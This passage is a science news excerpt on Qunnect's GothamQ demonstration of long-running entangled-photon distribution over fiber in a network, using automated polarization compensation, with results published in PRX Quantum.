"While others have transmitted entangled photons before, there has been too much noise and polarization drift in the fiber environment for entanglement to survive," the article points out, "particularly in a long-term stable network." So the Qunnect team built "automated polarization compensation" devices to correct the polarization of the entangled pairs: In their design, an infrared photon [with a wavelength of 1,324 nanometers] is entangled with a near-infrared photon of 795 nanometers. The latter photon is compatible in wavelength and bandwidth with the rubidium atomic systems, such as are used in quantum memories and quantum processors. It was found that polarization drift was both wavelength- and time-dependent, requiring Qunnect to design and build equipment for active compensation at the same wavelengths...

Qunnect's GothamQ loop demonstration was especially noteworthy for its duration, the hands-off nature of the operation time, and its uptime percentage. It showed, they wrote, "progress toward a fully automated practical entanglement network" that would be required for a quantum internet.

And Qunnect's co-founder/chief science officer says "since we finished this work, we have already made all the parts rack-mounted, so they can be used everywhere..."

Their network design and results are published in PRX Quantum.
